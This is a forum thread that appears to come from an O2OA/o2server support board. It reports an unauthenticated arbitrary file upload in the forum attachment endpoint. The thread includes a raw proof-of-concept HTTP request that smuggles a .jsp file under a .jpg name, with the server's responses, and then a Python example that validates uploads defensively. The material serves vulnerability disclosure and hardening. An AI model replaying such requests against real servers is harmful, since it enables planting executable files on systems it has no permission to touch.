There is a file upload vulnerability
This post was last edited by feifeimao on 2023-11-4 16:06

feifeimao: The platform was detected to have a file upload vulnerability; this looks like it is in the forum module.

Ray posted on 2023-11-6 11:29:
What is the specific form of the vulnerability, arbitrary file upload or something else?

Reply, quoting Ray (posted 2023-11-6 11:29): "What is the specific form of the vulnerability, arbitrary file upload or something else?"
Arbitrary files can be uploaded.

Ray: What version of o2server are you on? This issue has already been fixed; it should have been fixed in version 8.1.

Reply, quoting Ray (posted 2023-11-6 11:29): "What is the specific form of the vulnerability, arbitrary file upload or something else?"
Unauthorized arbitrary file upload: files can be written directly into the storage folder under bbs without logging in.
POST /x_bbs_assemble_control/jaxrs/attachment/upload/subject/161ccc21-3178-4e21-9b6f-5d36aed65ecb HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1435424574173394427053965142
Content-Length: 467
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
SL-CE-SUID: 21
-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="site"
161ccc21-3178-4e21-9b6f-5d36aed65ecb
-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="file"; filename="1.jsp"
123
-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="fileName"
1.jpg
-----------------------------1435424574173394427053965142--
{
"type": "success",
"data": {
"id": "0b0dd619-619a-433a-8578-1fd863117092"
},
"message": "",
"date": "2023-11-05 22:55:05",
"spent": 1674,
"size": -1,
"count": 0,
"position": 0
}
{
"type": "error",
"message": "附件:1.jsp, 不符合上传类型.",
"date": "2023-11-05 22:56:41",
"spent": 7,
"size": -1,
"count": 0,
"position": 0,
"prompt": "com.x.base.core.project.exception.ExceptionAttachmentInvalid"
}

Ray: I don't understand what you mean; judging from the message, didn't the upload fail?
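The request posted above carries two names for one upload: filename="1.jsp" on the file part and 1.jpg in the separate fileName field. The error response reads, in translation, "Attachment: 1.jsp, does not match a permitted upload type." The block below is an added example written for this thread; it is not o2server code and not taken from the posts. It parses a constructed multipart body shaped like the posted request with Python's stdlib email parser and shows the two checks a hardened attachment handler needs: the caller must be authenticated before anything about the file is considered, and the extension allowlist is applied to both client-supplied names. The allowlist, the authenticated flag, the build_body helper and the Upload type are assumptions, not the product's own.

```python
"""Server-side validation for a multipart attachment upload.

Added illustration for this thread; not O2OA/o2server code. The constructed
sample mirrors the request posted above: a "site" field, a "file" part with
its own filename (1.jsp), and a separate "fileName" field (1.jpg). The
allowlist and the authenticated flag are hypothetical.
"""
from __future__ import annotations

import email
import email.policy
import posixpath
from dataclasses import dataclass

# Hypothetical allowlist; the product's real list is not shown in the thread.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Same boundary string as the captured request.
BOUNDARY = "---------------------------1435424574173394427053965142"


def build_body(part_filename: str, declared_name: str, content: bytes = b"123") -> bytes:
    """Construct a multipart/form-data body shaped like the posted request."""
    crlf = b"\r\n"
    delim = b"--" + BOUNDARY.encode()
    parts = [
        delim, b'Content-Disposition: form-data; name="site"', b"",
        b"161ccc21-3178-4e21-9b6f-5d36aed65ecb",
        delim, b'Content-Disposition: form-data; name="file"; filename="'
        + part_filename.encode() + b'"', b"", content,
        delim, b'Content-Disposition: form-data; name="fileName"', b"",
        declared_name.encode(),
        delim + b"--", b"",
    ]
    return crlf.join(parts)


@dataclass
class Upload:
    site: str | None
    part_filename: str | None   # filename= on the "file" part
    declared_name: str | None   # the separate "fileName" field
    content: bytes


def parse_multipart(body: bytes, boundary: str) -> Upload:
    """Parse the body with the stdlib email parser by prepending a MIME header."""
    head = (f'Content-Type: multipart/form-data; boundary="{boundary}"\r\n'
            "MIME-Version: 1.0\r\n\r\n").encode()
    msg = email.message_from_bytes(head + body, policy=email.policy.default)
    fields: dict[str, str] = {}
    part_filename, content = None, b""
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        payload = part.get_payload(decode=True) or b""
        if name == "file":
            part_filename = part.get_filename()
            content = payload
        elif name:
            fields[name] = payload.decode("utf-8", "replace").strip()
    return Upload(fields.get("site"), part_filename, fields.get("fileName"), content)


def extension_of(name: str | None) -> str:
    """Final extension, lower-cased, after discarding any path components."""
    if not name:
        return ""
    base = posixpath.basename(name.replace("\\", "/"))
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def validate_upload(upload: Upload, authenticated: bool) -> tuple[bool, str]:
    """Return (accepted, reason).

    Authentication is decided first: an extension filter on its own does not
    close an endpoint that anonymous callers can reach. Then both names the
    client supplied must pass the allowlist and agree with each other, so a
    .jsp part cannot ride behind fileName=1.jpg.
    """
    if not authenticated:
        return False, "unauthorized: login required"
    for label, name in (("file part", upload.part_filename),
                        ("fileName", upload.declared_name)):
        if extension_of(name) not in ALLOWED_EXTENSIONS:
            return False, f"{label} {name!r}: type not permitted"
    if extension_of(upload.part_filename) != extension_of(upload.declared_name):
        return False, "file part and fileName extensions differ"
    return True, "ok"


if __name__ == "__main__":
    posted = parse_multipart(build_body("1.jsp", "1.jpg"), BOUNDARY)
    print(validate_upload(posted, authenticated=False))
    print(validate_upload(posted, authenticated=True))
    print(validate_upload(parse_multipart(build_body("1.jpg", "1.jpg"), BOUNDARY), True))
```

Running the block prints the three decisions: anonymous callers are refused before the file is inspected, the posted 1.jsp/1.jpg pair is refused on the part filename, and a consistent 1.jpg upload is accepted. Ordering the checks this way matters for the report in this thread, since the complaint is that the endpoint is reachable without logging in, which a type filter by itself does not address.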